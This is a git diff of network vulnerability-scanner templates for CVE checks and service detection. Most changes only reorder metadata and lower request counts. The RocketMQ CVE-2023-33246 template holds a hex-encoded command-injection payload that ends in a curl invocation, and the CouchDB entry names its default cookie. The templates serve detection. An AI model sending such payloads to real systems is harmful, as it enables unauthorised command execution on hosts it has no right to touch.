a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml index b0515d8c77..d5eaa9bff3 100644 --- a/network/cves/2017/CVE-2017-3881.yaml +++ b/network/cves/2017/CVE-2017-3881.yaml @@ -6,24 +6,24 @@ info: severity: critical description: | A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893. - remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access. reference: - https://github.com/artkond/cisco-rce - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md - https://nvd.nist.gov/vuln/detail/CVE-2017-3881 - http://www.securitytracker.com/id/1038059 + remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-3881 cwe-id: CWE-20 - epss-score: 0.97332 cpe: cpe:2.3:o:cisco:ios:*:*:*:*:*:*:*:* + epss-score: 0.97332 metadata: - max-request: 2 - vendor: cisco + max-request: 1 product: ios + vendor: cisco tags: cve,cve2017,cisco,rce,network,kev,msf tcp: - host: diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml index 7ef472e9aa..bc107e8599 100644 --- a/network/cves/2017/CVE-2017-5645.yaml +++ b/network/cves/2017/CVE-2017-5645.yaml @@ -6,25 +6,25 @@ info: severity: critical description: | In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. - remediation: | - Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups. reference: - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645 - https://nvd.nist.gov/vuln/detail/CVE-2017-5645 - http://www.openwall.com/lists/oss-security/2019/12/19/2 - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html - http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html + remediation: | + Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-5645 cwe-id: CWE-502 - epss-score: 0.74805 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* + epss-score: 0.74805 metadata: - max-request: 2 - vendor: apache + max-request: 1 product: log4j + vendor: apache tags: cve,cve2017,vulhub,network,apache,log4j,rce,deserialization,oast, variables: end: "\r\n" diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index 40da5cb75e..cc64f7feda 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-2893 - epss-score: 0.973460000 + epss-score: 0.97346 metadata: - max-request: 2 + max-request: 1 tags: cve,cve2018,weblogic,network,deserialization,rce,oracle tcp: diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml index d5951f7dc7..76d5b77b9c 100644 --- a/network/cves/2020/CVE-2020-11981.yaml +++ b/network/cves/2020/CVE-2020-11981.yaml @@ -15,9 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11981 cwe-id: CWE-78 - epss-score: 0.936930000 + epss-score: 0.93693 metadata: - max-request: 2 + max-request: 1 shodan-query: product:"redis" verified: true tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml index 16130426c3..b6ea57e1b9 100644 --- a/network/cves/2020/CVE-2020-1938.yaml +++ b/network/cves/2020/CVE-2020-1938.yaml @@ -5,25 +5,25 @@ info: author: milo2012 severity: critical description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. - remediation: https://access.redhat.com/solutions/4851251 reference: - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 - https://nvd.nist.gov/vuln/detail/CVE-2020-1938 - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E - http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html + remediation: https://access.redhat.com/solutions/4851251 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-1938 cwe-id: CWE-269 - epss-score: 0.97486 cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:* + epss-score: 0.97486 metadata: - max-request: 4 - vendor: apache + max-request: 1 product: geode shodan-query: title:"Apache Tomcat" + vendor: apache tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat tcp: - host: diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml index a74985f436..5197b8fa7e 100644 --- a/network/cves/2020/CVE-2020-7247.yaml +++ b/network/cves/2020/CVE-2020-7247.yaml @@ -6,24 +6,24 @@ info: severity: critical description: | OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation. - remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6 reference: - https://www.openwall.com/lists/oss-security/2020/01/28/3 - https://nvd.nist.gov/vuln/detail/CVE-2020-7247 - https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45 - http://www.openwall.com/lists/oss-security/2020/01/28/3 - http://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html + remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7247 cwe-id: CWE-755 - epss-score: 0.9749 cpe: cpe:2.3:a:openbsd:opensmtpd:6.6:*:*:*:*:*:*:* + epss-score: 0.9749 metadata: - max-request: 2 - vendor: openbsd + max-request: 1 product: opensmtpd + vendor: openbsd tags: cve,cve2020,smtp,opensmtpd,network,rce,oast,kev tcp: - host: diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml index 5b017f6a77..7e4729c059 100644 --- a/network/cves/2021/CVE-2021-44521.yaml +++ b/network/cves/2021/CVE-2021-44521.yaml @@ -5,7 +5,6 @@ info: author: Y4er severity: critical description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.' - remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2 reference: - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/ - https://nvd.nist.gov/vuln/detail/CVE-2021-44521 @@ -13,17 +12,18 @@ info: - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356 - http://www.openwall.com/lists/oss-security/2022/02/11/4 - https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/ + remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-44521 cwe-id: CWE-732,CWE-94 - epss-score: 0.01212 cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:* + epss-score: 0.01212 metadata: - max-request: 2 - vendor: apache + max-request: 1 product: cassandra + vendor: apache tags: cve,cve2021,network,rce,apache,cassandra tcp: - host: diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml index ebe5b94ebb..0940db59f8 100644 --- a/network/cves/2022/CVE-2022-0543.yaml +++ b/network/cves/2022/CVE-2022-0543.yaml @@ -9,24 +9,24 @@ info: vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. - remediation: Update to the most recent versions currently available. reference: - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis - https://bugs.debian.org/1005787 - https://www.debian.org/security/2022/dsa-5081 - https://lists.debian.org/debian-security-announce/2022/msg00048.html + remediation: Update to the most recent versions currently available. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2022-0543 - epss-score: 0.97184 cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:* + epss-score: 0.97184 metadata: - max-request: 4 - vendor: redis + max-request: 1 product: redis shodan-query: redis_version + vendor: redis tags: cve,cve2022,network,redis,unauth,rce,kev tcp: - host: diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml index 583f7ac40b..c4f16b7cce 100644 --- a/network/cves/2022/CVE-2022-24706.yaml +++ b/network/cves/2022/CVE-2022-24706.yaml @@ -6,27 +6,27 @@ info: severity: critical description: | In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. - remediation: | - Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value. reference: - https://www.exploit-db.com/exploits/50914 - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py - https://nvd.nist.gov/vuln/detail/CVE-2022-24706 - http://www.openwall.com/lists/oss-security/2022/04/26/1 - http://www.openwall.com/lists/oss-security/2022/05/09/1 + remediation: | + Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24706 cwe-id: CWE-1188 - epss-score: 0.97407 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* + epss-score: 0.97407 metadata: - verified: "true" - max-request: 2 - vendor: apache + max-request: 1 product: couchdb shodan-query: product:"CouchDB" + vendor: apache + verified: "true" tags: cve,cve2022,network,couch,rce,kev variables: name_msg: "00156e00050007499c4141414141414041414141414141" diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml index babe5d2f4c..f4ee827cdc 100644 --- a/network/cves/2023/CVE-2023-33246.yaml +++ b/network/cves/2023/CVE-2023-33246.yaml @@ -6,27 +6,27 @@ info: severity: critical description: | For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x . - remediation: Update the RocketMQ application to version 5.1.1 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-33246 - https://github.com/I5N0rth/CVE-2023-33246 - http://packetstormsecurity.com/files/173339/Apache-RocketMQ-5.1.0-Arbitrary-Code-Injection.html - http://www.openwall.com/lists/oss-security/2023/07/12/1 - https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp + remediation: Update the RocketMQ application to version 5.1.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-33246 cwe-id: CWE-94 - epss-score: 0.95581 cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:* + epss-score: 0.95581 metadata: - verified: true - max-request: 2 - vendor: apache + fofa-query: protocol="rocketmq" + max-request: 1 product: rocketmq shodan-query: title:"RocketMQ" - fofa-query: protocol="rocketmq" + vendor: apache + verified: true tags: cve,cve2023,rocketmq,rce,oast,intrusive,network variables: part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}' diff --git a/network/default-login/ftp-anonymous-login.yaml b/network/default-login/ftp-anonymous-login.yaml index 552eb7830a..4888a5170b 100644 --- a/network/default-login/ftp-anonymous-login.yaml +++ b/network/default-login/ftp-anonymous-login.yaml @@ -4,13 +4,13 @@ info: name: FTP Anonymous Login author: C3l3si4n,pussycat0x severity: medium - reference: - - https://tools.ietf.org/html/rfc2577 description: | Anonymous FTP access allows anyone to access your public_ftp folder, allowing unidentified visitors to download (and possibly upload) files on your website. Anonymous FTP creates the potential for a security hole for hackers and is not recommended. - tags: network,ftp,default-login + reference: + - https://tools.ietf.org/html/rfc2577 metadata: - max-request: 2 + max-request: 1 + tags: network,ftp,default-login tcp: - inputs: diff --git a/network/default-login/ftp-weak-credentials.yaml b/network/default-login/ftp-weak-credentials.yaml index 06181d3b73..8e8ae5c1c2 100644 --- a/network/default-login/ftp-weak-credentials.yaml +++ b/network/default-login/ftp-weak-credentials.yaml @@ -8,11 +8,11 @@ info: reference: - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/ classification: - cvss-score: 8.5 cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N - tags: network,ftp,default-login,service + cvss-score: 8.5 metadata: - max-request: 2 + max-request: 1 + tags: network,ftp,default-login,service tcp: diff --git a/network/default-login/ldap-anonymous-login.yaml b/network/default-login/ldap-anonymous-login.yaml index c6ed3c04da..48d4b0e1d8 100644 --- a/network/default-login/ldap-anonymous-login.yaml +++ b/network/default-login/ldap-anonymous-login.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-284 - tags: network,ldap,default-login,tenable metadata: - max-request: 2 + max-request: 1 + tags: network,ldap,default-login,tenable tcp: - inputs: diff --git a/network/detection/activemq-openwire-transport-detect.yaml b/network/detection/activemq-openwire-transport-detect.yaml index 9e1b3c9164..7502fb0322 100644 --- a/network/detection/activemq-openwire-transport-detect.yaml +++ b/network/detection/activemq-openwire-transport-detect.yaml @@ -7,9 +7,9 @@ info: description: | OpenWire is the native protocol that Apache ActiveMQ uses. It is designed for performance and size on the wire - sacrificing some ease of implementation with higher performance and reduced network bandwidth as a priority. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"ActiveMQ OpenWire transport" verified: true - shodan-query: 'product:"ActiveMQ OpenWire transport"' tags: network,activemq,detect tcp: diff --git a/network/detection/apache-activemq-detect.yaml b/network/detection/apache-activemq-detect.yaml index 0d8842fd91..82acb9b8a4 100644 --- a/network/detection/apache-activemq-detect.yaml +++ b/network/detection/apache-activemq-detect.yaml @@ -7,9 +7,9 @@ info: description: | Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"Apache ActiveMQ" verified: true - shodan-query: 'product:"Apache ActiveMQ"' tags: network,activemq,oss,detect tcp: diff --git a/network/detection/axigen-mail-server-detect.yaml b/network/detection/axigen-mail-server-detect.yaml index 5de2d9d507..5c3bc6fa86 100644 --- a/network/detection/axigen-mail-server-detect.yaml +++ b/network/detection/axigen-mail-server-detect.yaml @@ -7,10 +7,10 @@ info: description: | Axigen Mail Server was detected. metadata: - max-request: 2 - verified: true fofa-query: app="axigen-Mail-Server" + max-request: 1 shodan-query: product:"Axigen" + verified: true tags: network,axigen,detect tcp: diff --git a/network/detection/cisco-finger-detect.yaml b/network/detection/cisco-finger-detect.yaml index 72d1eeea38..f6a77f458d 100644 --- a/network/detection/cisco-finger-detect.yaml +++ b/network/detection/cisco-finger-detect.yaml @@ -7,9 +7,9 @@ info: description: | The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"Cisco fingerd" + verified: true tags: network,finger,detect tcp: diff --git a/network/detection/clamav-detect.yaml b/network/detection/clamav-detect.yaml index d310c515cf..dcd689a06e 100644 --- a/network/detection/clamav-detect.yaml +++ b/network/detection/clamav-detect.yaml @@ -7,9 +7,9 @@ info: description: | Clam AntiVirus is a free software, cross-platform antimalware toolkit able to detect many types of malware, including viruses. metadata: - max-request: 2 + max-request: 1 + shodan-query: port:3310 product:"ClamAV" verified: true - shodan-query: 'port:3310 product:"ClamAV"' tags: network,clamav,detect tcp: diff --git a/network/detection/cql-native-transport.yaml b/network/detection/cql-native-transport.yaml index cf8cab548e..0f5429b67a 100644 --- a/network/detection/cql-native-transport.yaml +++ b/network/detection/cql-native-transport.yaml @@ -7,9 +7,9 @@ info: description: | Native transport requests (NTR) are any requests made via the CQL Native Protocol. CQL Native Protocol is the way the Cassandra driver communicates with the server. metadata: - max-request: 2 + max-request: 1 + shodan-query: cassandra verified: true - shodan-query: "cassandra" tags: network,cassandra,cql,detect tcp: diff --git a/network/detection/detect-addpac-voip-gateway.yaml b/network/detection/detect-addpac-voip-gateway.yaml index 59bb244d24..250e4812b5 100644 --- a/network/detection/detect-addpac-voip-gateway.yaml +++ b/network/detection/detect-addpac-voip-gateway.yaml @@ -10,11 +10,10 @@ info: - http://www.addpac.com/addpac_eng2/down.php?file=505_f16.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 - tags: network,addpac,apos,voip,detect metadata: - max-request: 2 + max-request: 1 + tags: network,addpac,apos,voip,detect tcp: - inputs: diff --git a/network/detection/detect-jabber-xmpp.yaml b/network/detection/detect-jabber-xmpp.yaml index 5dbc697df4..924315c66d 100644 --- a/network/detection/detect-jabber-xmpp.yaml +++ b/network/detection/detect-jabber-xmpp.yaml @@ -9,11 +9,10 @@ info: - https://datatracker.ietf.org/doc/html/rfc6120 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 - tags: network,jabber,xmpp,messaging,detect metadata: - max-request: 2 + max-request: 1 + tags: network,jabber,xmpp,messaging,detect tcp: - inputs: diff --git a/network/detection/dotnet-remoting-service-detect.yaml b/network/detection/dotnet-remoting-service-detect.yaml index eecbbf3434..4183336714 100644 --- a/network/detection/dotnet-remoting-service-detect.yaml +++ b/network/detection/dotnet-remoting-service-detect.yaml @@ -8,12 +8,11 @@ info: Microsoft .NET Remoting httpd was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"MS .NET Remoting httpd" + verified: true tags: network,detect,microsoft tcp: diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml index 87bfc728d5..2e640b11b8 100644 --- a/network/detection/dropbear-cbc-ciphers.yaml +++ b/network/detection/dropbear-cbc-ciphers.yaml @@ -6,14 +6,14 @@ info: severity: low description: | The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext. - remediation: | - Disable CBC Ciphers. reference: | https://www.tenable.com/plugins/nessus/70658 + remediation: | + Disable CBC Ciphers. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"Dropbear sshd" verified: true - shodan-query: 'product:"Dropbear sshd"' tags: network,ssh,dropbear,detect tcp: diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index 2aecc3c599..1f248170ee 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml @@ -10,12 +10,11 @@ info: - https://nmap.org/nsedoc/scripts/smtp-open-relay.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 + max-request: 1 + shodan-query: ESMTP verified: true - shodan-query: 'ESMTP' tags: network,detect,smtp,mail tcp: diff --git a/network/detection/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml index 4408acfc97..ed7c818097 100644 --- a/network/detection/expn-mail-detect.yaml +++ b/network/detection/expn-mail-detect.yaml @@ -6,9 +6,9 @@ info: severity: info description: | The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information. - tags: mail,expn,network,detect metadata: - max-request: 2 + max-request: 1 + tags: mail,expn,network,detect tcp: - inputs: diff --git a/network/detection/finger-detect.yaml b/network/detection/finger-detect.yaml index 80a548d404..4384319476 100644 --- a/network/detection/finger-detect.yaml +++ b/network/detection/finger-detect.yaml @@ -7,9 +7,9 @@ info: description: | The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: port:"79" action + verified: true tags: network,finger,detect tcp: diff --git a/network/detection/gnu-inetutils-ftpd-detect.yaml b/network/detection/gnu-inetutils-ftpd-detect.yaml index 85460f07dc..b4f560c0ad 100644 --- a/network/detection/gnu-inetutils-ftpd-detect.yaml +++ b/network/detection/gnu-inetutils-ftpd-detect.yaml @@ -7,9 +7,9 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"GNU Inetutils FTPd" verified: true - shodan-query: 'product:"GNU Inetutils FTPd"' tags: network,ftp,smartgateway,gnu,inetutils,detect tcp: diff --git a/network/detection/gopher-detect.yaml b/network/detection/gopher-detect.yaml index 3d1ee9fdcb..789954f457 100644 --- a/network/detection/gopher-detect.yaml +++ b/network/detection/gopher-detect.yaml @@ -8,11 +8,10 @@ info: Gopher service was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 - tags: network,gopher,detect metadata: - max-request: 2 + max-request: 1 + tags: network,gopher,detect tcp: - inputs: diff --git a/network/detection/ibm-d2b-database-server.yaml b/network/detection/ibm-d2b-database-server.yaml index c6a68dcb83..2fb08c0ca6 100644 --- a/network/detection/ibm-d2b-database-server.yaml +++ b/network/detection/ibm-d2b-database-server.yaml @@ -10,12 +10,11 @@ info: - https://nmap.org/nsedoc/scripts/db2-das-info.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"IBM DB2 Database Server" + verified: true tags: network,ibm,database,db,db2,detect tcp: diff --git a/network/detection/imap-detect.yaml b/network/detection/imap-detect.yaml index c976843061..f148865b90 100644 --- a/network/detection/imap-detect.yaml +++ b/network/detection/imap-detect.yaml @@ -8,12 +8,11 @@ info: IMAP was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 + max-request: 1 + shodan-query: imap verified: true - shodan-query: 'imap' tags: network,detect,imap,mail tcp: diff --git a/network/detection/iplanet-imap-detect.yaml b/network/detection/iplanet-imap-detect.yaml index 60bc7b1b86..37ddd8519e 100644 --- a/network/detection/iplanet-imap-detect.yaml +++ b/network/detection/iplanet-imap-detect.yaml @@ -8,11 +8,10 @@ info: iPlanet Messaging Server IMAP protocol was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap" + max-request: 1 tags: network,imap,detect tcp: diff --git a/network/detection/microsoft-ftp-service.yaml b/network/detection/microsoft-ftp-service.yaml index b0cc34b288..577a884721 100644 --- a/network/detection/microsoft-ftp-service.yaml +++ b/network/detection/microsoft-ftp-service.yaml @@ -7,9 +7,9 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: - max-request: 2 + max-request: 1 + shodan-query: Microsoft FTP Service verified: true - shodan-query: "Microsoft FTP Service" tags: network,ftp,microsoft,detect tcp: diff --git a/network/detection/mikrotik-ftp-server-detect.yaml b/network/detection/mikrotik-ftp-server-detect.yaml index 32fdf0196f..5eddbb1f40 100644 --- a/network/detection/mikrotik-ftp-server-detect.yaml +++ b/network/detection/mikrotik-ftp-server-detect.yaml @@ -7,9 +7,9 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"MikroTik router ftpd" verified: true - shodan-query: 'product:"MikroTik router ftpd"' tags: network,ftp,mikrotik,router,detect tcp: diff --git a/network/detection/mikrotik-routeros-api.yaml b/network/detection/mikrotik-routeros-api.yaml index 8bc12b6619..1c07c6a24b 100644 --- a/network/detection/mikrotik-routeros-api.yaml +++ b/network/detection/mikrotik-routeros-api.yaml @@ -8,12 +8,11 @@ info: MikroTik RouterOS API was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"MikroTik RouterOS API Service" + verified: true tags: network,mikrotik,detect tcp: diff --git a/network/detection/mongodb-detect.yaml b/network/detection/mongodb-detect.yaml index 767acb5329..8b89e6e4da 100644 --- a/network/detection/mongodb-detect.yaml +++ b/network/detection/mongodb-detect.yaml @@ -6,15 +6,14 @@ info: severity: info description: | MongoDB service was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://github.com/orleven/Tentacle - tags: network,mongodb,detect + classification: + cvss-metrics: 